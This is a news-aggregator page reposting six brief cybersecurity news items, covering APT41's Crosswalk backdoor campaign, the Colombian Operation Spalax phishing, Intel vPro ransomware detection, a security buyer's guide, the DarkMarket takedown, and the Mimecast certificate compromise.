Select Page
Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks

Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks

Cybersecurity researchers have disclosed a series of attacks by a threat actor of Chinese origin that has targeted organizations in Russia and Hong Kong with malware — including a previously undocumented backdoor.

Attributing the campaign to Winnti (or APT41), Positive Technologies dated the first attack to May 12, 2020, when the APT used LNK shortcuts to extract and run the malware payload. A second attack detected on May 30 used a malicious RAR archive file consisting of shortcuts to two bait PDF documents claimed to be a curriculum vitae and an IELTS certificate.

 

The shortcuts themselves contain links to pages hosted on Zeplin, a legitimate collaboration tool for designers and developers that are used to fetch the final-stage malware that, in turn, includes a shellcode loader (“svchast.exe”) and a backdoor called Crosswalk (“3t54dE3r.tmp”).

Crosswalk, first documented by FireEye in 2017, is a bare-bones modular backdoor capable of carrying out system reconnaissance and receiving additional modules from an attacker-controlled server as shellcode.

While this modus operandi shares similarities with that of the Korean threat group Higaisa — which was found exploiting LNK files attached in an email to launching attacks on unsuspecting victims in 2020 — the researchers said the use of Crosswalk suggests the involvement of Winnti.

images from Hacker News

Experts Uncover Malware Attacks Against Colombian Government and Companies

Experts Uncover Malware Attacks Against Colombian Government and Companies

Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries.

In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed “Operation Spalax” — began in 2020, with the modus operandi sharing some similarities to an APT group targeting the country since at least April 2018, but also different in other ways.

The overlaps come in the form of phishing emails, which have similar topics and pretend to come from some of the same entities that were used in a February 2019 operation disclosed by QiAnXin researchers, and subdomain names used for command-and-control (C2) servers.

However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped.

The attack chain begins with the targets receiving phishing emails that lead to the download of malicious files, which are RAR archives hosted on OneDrive or MediaFire containing various droppers responsible for decrypting and running RATs such as RemcosnjRAT, and AsyncRAT on a victimized computer.

images from Hacker News

Intel Adds Hardware-Enabled Ransomware Detection to 11th Gen vPro Chips

Intel Adds Hardware-Enabled Ransomware Detection to 11th Gen vPro Chips

Intel and Cybereason have partnered to build anti-ransomware defences into the chipmaker’s newly announced 11th generation Core vPro business-class processors.

The hardware-based security enhancements are baked into Intel’s vPro platform via its Hardware Shield and Threat Detection Technology (TDT), enabling profiling and detection of ransomware and other threats that have an impact on the CPU performance.

“The joint solution represents the first instance where PC hardware plays a direct role in ransomware defences to better protect enterprise endpoints from costly attacks,” Cybereason said.

 

Exclusive to vPro, Intel Hardware Shield provides protections against firmware-level attacks targeting the BIOS, thereby ensuring that the operating system (OS) runs on legitimate hardware as well as minimizing the risk of malicious code injection by locking down memory in the BIOS when the software is running to help prevent planted malware from compromising the OS.

Intel TDT, on the other hand, leverages a combination of CPU telemetry data and machine learning-based heuristics to identify anomalous attack behaviour — including polymorphic malware, file-less scripts, crypto mining, and ransomware infections — in real-time.

images from Hacker News

Buyer’s Guide for Securing Internal Environment with a Small Cybersecurity Team

Buyer’s Guide for Securing Internal Environment with a Small Cybersecurity Team

Ensuring the cybersecurity of your internal environment when you have a small security team is challenging. If you want to maintain the highest security level with a small team, your strategy has to be ‘do more with less,’ and with the right technology, you can leverage your team and protect your internal environment from breaches.

The “buyer’s guide for securing the internal environment with a small cybersecurity team,” includes a checklist of the most important things to consider when creating or re-evaluating the cybersecurity of your internal environment to ensure your team has it all covered.

The buyer’s guide is designed to help you choose the solution that will ensure you get complete visibility, accurately detect and mitigate threats, and make the most of your existing resources and skills. There are three key aspects that stand out when looking for the best way to protect your internal environment with a small team—visibility, automation, and ease of use.

If you can’t see it, you can’t keep it secure

With the attack surface continually growing and your endpoints and employees being spread across multiple locations, visibility of your entire internal environment is critical for its protection. How do you ensure visibility?

1. Asset discovery – make sure you know about all your endpoints so that you can keep them monitored and updated.

2. Advanced endpoint security – ‘understand’ the endpoint’s behavior in order to detect anomalies and stealthy attacks.

3. Natively integrated advanced technologies including NGAV, EDR, NTA/NDR, UEBA, and Deception Technology, to ensure coverage and timely detection.

images from Hacker News

Authorities Take Down World’s Largest Illegal Dark Web Marketplace

Authorities Take Down World’s Largest Illegal Dark Web Marketplace

Europol on Tuesday said it shut down DarkMarket, the world’s largest online marketplace for illicit goods, as part of an international operation involving Germany, Australia, Denmark, Moldova, Ukraine, the U.K.’s National Crime Agency (NCA), and the U.S. Federal Bureau of Investigation (FBI).

At the time of closure, DarkMarket is believed to have had 500,000 users and more than 2,400 vendors, with over 320,000 transactions resulting in the transfer of more than 4,650 bitcoin and 12,800 monero — a sum total of €140 million ($170 million).

The illegal internet market specialized in the sales of drugs, counterfeit money, stolen or forged credit card information, anonymous SIM cards, and off-the-shelf malware.

 

In addition, the months-long intelligence operation also resulted in the arrest of a 34-year-old Australian national near the German-Danish border over the weekend, who is alleged to be the mastermind behind DarkMarket.

According to The Guardian, DarkMarket came to light in the course of a major investigation against the web hosting service CyberBunker, which served as the web host for The Pirate Bay and WikiLeaks in the past.

images from Hacker News

Hackers Steal Mimecast Certificate Used to Securely Connect with Microsoft 365

Hackers Steal Mimecast Certificate Used to Securely Connect with Microsoft 365

Mimecast said on Tuesday that “a sophisticated threat actor” had compromised a digital certificate it provided to certain customers to securely connect its products to Microsoft 365 (M365) Exchange.

The discovery was made after the breach was notified by Microsoft, the London-based company said in an alert posted on its website, adding it’s reached out to the impacted organizations to remediate the issue.

The company didn’t elaborate on what type of certificate was compromised, but Mimecast offers seven different digital certificates based on the geographical location that must be uploaded to M365 to create a server Connection in Mimecast.

 

“Approximately 10 percent of our customers use this connection,” the company said. “Of those that do, there are indications that a low single digit number of our customers’ M365 tenants were targeted.”

Mimecast is a cloud-based email management service for Microsoft Exchange and Microsoft Office 365, offers users email security and continuity platform to safeguard them from spam, malware, phishing, and targeted attacks.

images from Hacker News